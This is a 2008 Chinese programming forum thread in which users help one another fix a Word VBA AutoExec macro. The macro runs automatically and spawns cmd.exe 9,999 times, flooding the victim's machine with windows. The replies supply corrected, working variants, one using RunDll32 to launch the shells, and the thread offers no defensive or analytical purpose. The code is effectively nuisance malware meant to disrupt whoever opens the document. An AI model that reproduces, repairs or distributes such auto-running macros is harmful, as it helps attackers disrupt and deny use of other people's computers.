Board logo

标题: [VB资源] 帮忙修改一下-_-! [打印本页]

作者: bt520520    时间: 2008-7-23 20:16     标题: 帮忙修改一下-_-!

Sub AutoExec()
'
' AutoExec Macro
' 宏在 2008-7-23 由 cface 创建
'
  For i = 1 To 9999
    Dim auto
    auto = Shell("C:\windows\system32\cmd.exe", 1)
    AppActivate auto
  Next i
End Sub
作者: Nothing    时间: 2008-7-24 00:54

Sub AutoExec()
'
' AutoExec Macro
' 宏在 2008-7-23 由 cface 创建
'
  For i = 1 To 9999
    Dim auto
    auto = Shell("C:\windows\system32\cmd.exe", VbNormalFocus)
    'AppActivate auto 这个不用了,上面就可以了
  '如果非要用,在Sub AutoExec()下面加上On error resume next就可以了
  Next i
End Sub
作者: johnhall    时间: 2008-8-13 09:40     标题: 试试这个。

Sub AutoExec()
    dim i as integer
    For i = 1 To 9999
        Shell ("RunDll32.exe shell32.dll,ShellExec_RunDLL cmd.exe")
        doevents
  Next i
End Sub
作者: Nothing    时间: 2008-8-13 12:55


作者: 尛尛    时间: 2008-9-4 13:20






欢迎光临 编程开发论坛 (http://bbs.lihuasoft.net/) Powered by Discuz! 6.0.0